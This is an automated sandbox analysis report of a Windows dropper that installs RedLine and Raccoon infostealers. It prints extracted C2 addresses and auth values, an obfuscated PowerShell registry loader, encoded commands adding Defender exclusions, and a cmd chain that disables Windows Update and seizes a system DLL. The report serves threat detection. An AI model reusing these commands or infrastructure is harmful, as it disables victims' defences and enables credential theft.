Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-1703_x64 -
resource
win10-20220718-en -
resource tags
-
submitted
08-08-2022 17:29
General
-
Target
598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe
-
Size
860KB
-
MD5
8f8d654c2fa15bb497f14db0bd2d00a1
-
SHA1
432a7601bc0607257a956e86f39003eb32eb7334
-
SHA256
598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6
-
SHA512
7a505ec7e96414fe8b972f87cb96e661122df222a44476f1ab3f585e19ad7d698484c0d39a6ff2433fbbe718305c1dad14ddb9a643b36bf844896038a4fb42bd
Malware Config
Extracted
redline
nam3
103.89.90.61:18728
-
auth_value
64b900120bbceaa6a9c60e9079492895
Extracted
redline
4
31.41.244.134:11643
-
auth_value
a516b2d034ecd34338f12b50347fbd92
Extracted
redline
@tag12312341
62.204.41.144:14096
-
auth_value
71466795417275fac01979e57016e277
Extracted
raccoon
afb5c633c4650f69312baef49db9dfa4
http://77.73.132.74
Extracted
raccoon
f0c8034c83808635df0d9d8726d1bfd6
http://45.95.11.158/
Extracted
redline
5076357887
195.54.170.157:16525
-
auth_value
0dfaff60271d374d0c206d19883e06f3
Extracted
redline
alfa
46.175.148.142:32178
-
auth_value
5f6c4b42c0bce31d7557ce1726a401c5
Signatures
-
Modifies security service 2 TTPs 5 IoCs
-
Raccoon
Raccoon is an infostealer written in C++ and first seen in 2019.
-
Raccoon Stealer payload 5 IoCs
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 15 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs
-
Enumerates VirtualBox DLL files 2 TTPs 20 IoCs
-
Looks for VirtualBox drivers on disk 2 TTPs 8 IoCs
-
Looks for VirtualBox executables on disk 2 TTPs 6 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
-
Executes dropped EXE 15 IoCs
-
Looks for VMWare drivers on disk 2 TTPs 6 IoCs
-
Possible privilege escalation attempt 4 IoCs
-
Stops running service(s) 3 TTPs
-
UPX packed file 7 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 1 IoCs
-
Modifies file permissions 1 TTPs 4 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses 2FA software files, possible credential harvesting 2 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 7 IoCs
-
Suspicious use of SetThreadContext 4 IoCs
-
Drops file in Program Files directory 13 IoCs
-
Drops file in Windows directory 14 IoCs
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 4 IoCs
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Modifies Internet Explorer settings 1 TTPs 3 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 64 IoCs
-
Modifies registry key 1 TTPs 18 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: MapViewOfSection 8 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 2 IoCs
-
Suspicious use of SetWindowsHookEx 5 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of FindShellTrayWindow
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{f17f1ecd-6e21-4df7-a6f5-ec18b441dc1c}2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{ed8471e8-e9c2-43da-b081-16793679315a}2⤵
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{ed8471e8-e9c2-43da-b081-16793679315a}2⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s LSM1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
-
c:\windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAHgAcwAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABEAGUAZgBlAG4AZABlAHIAXAB1AHAAZABhAHQAZQByAC4AZQB4AGUAJwAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwAgADwAIwB4AG8AIwA+AA=="2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Defender\updater.exe"C:\Program Files\Defender\updater.exe"3⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Program Files\Defender\updater.exe"4⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAdQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGgAZQB2AHoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAZgBjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAaQB1AHUAIwA+AA=="5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc6⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f6⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f6⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 05⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 06⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 06⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 06⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 06⤵
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe "vktwbryast"5⤵
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe ipbedfnzjahdakqh1 6E3sjfZq2rJQaxvLPmXgsBL6xjjYguHWtOpZ+stIdvtFmxXu9Su4ZmZ4m248qJKzYqn0Ua9E3eZCF6KVDnl4Om3mtJYdu2zYxf5VDSOtlwzNI2HELjSSWiBbhmq9nnQLcymNaMLbX6BcVfekXBXlHwtkdZ87kGHVBeHkhms/rlEKec4HZ9wIBVrc9Qi+y2+a3lep8HRZlmoXu5C0nH5vK2Z6XqFAlqh1P1TH9zlUlrSoi8iC8XAKUbdPgbva/qi9DzYr1RVc8QqRoXX8h4GvBaNJoiMytDP1XZ+7BxVOZddNH0XJdiGTlhqmJ6roc2xDtAY0xSKzjDUzaj6VcQ6dE4nGnXfnrH194gWO2Fle+qlRtL5DmSlHKlQNVMEwD+lLyH/56tXiuxnzEBOxWLJZa4aP8Qv/WXczd4ddilDeMPY13j7jZPu5TdLr9XBYda4eAoR+/sMI7GkWIp7kzt33mbRgFNWCnFMaeMKFES0bIFWeyERnCk6Cca6inZazVZL2NRgqXM5YGjKskzonMW4pRj1hd/GPPUtddJe8zDZNRC1MNGnbEKRTt1kwAWqH0zEt5⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s nsi1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s EventSystem1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\sihost.exesihost.exe2⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s NlaSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s FontCache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s CDPSvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1912 -s 7842⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3660 -s 11802⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3660 -s 11602⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe"C:\Users\Admin\AppData\Local\Temp\598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe"2⤵
- Checks computer location settings
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe"C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Company\NewProduct\safert44.exe"C:\Program Files (x86)\Company\NewProduct\safert44.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe"C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe"3⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\real.exe"C:\Program Files (x86)\Company\NewProduct\real.exe"3⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4688 -s 12604⤵
- Program crash
-
C:\Program Files (x86)\Company\NewProduct\F0geI.exe"C:\Program Files (x86)\Company\NewProduct\F0geI.exe"3⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\tag.exe"C:\Program Files (x86)\Company\NewProduct\tag.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Company\NewProduct\jshainx.exe"C:\Program Files (x86)\Company\NewProduct\jshainx.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Company\NewProduct\MouseAtHome.exe"C:\Program Files (x86)\Company\NewProduct\MouseAtHome.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe"C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe"4⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZgB0ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHgAYwBhACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAQQBsAGwAIAB2AGkAcgB1AHMAZQBzACAAaABhAHMAIABiAGUAZQBuACAAZABlAGwAZQB0AGUAZAAnACwAJwAnACwAJwBPAEsAJwAsACcASQBuAGYAbwByAG0AYQB0AGkAbwBuACcAKQA8ACMAdgBkAGUAIwA+AA=="5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAaABlACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcAbABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AbAB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHUAcQBoACMAPgA="5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Windows Defender.exe"C:\Users\Admin\Windows Defender.exe"5⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\Windows Defender.exe"6⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAdQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGgAZQB2AHoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAZgBjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAaQB1AHUAIwA+AA=="7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE7⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc8⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc8⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv8⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits8⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc8⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f8⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f8⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f8⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f8⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f8⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll8⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q8⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f8⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f8⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f8⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f8⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE8⤵
-
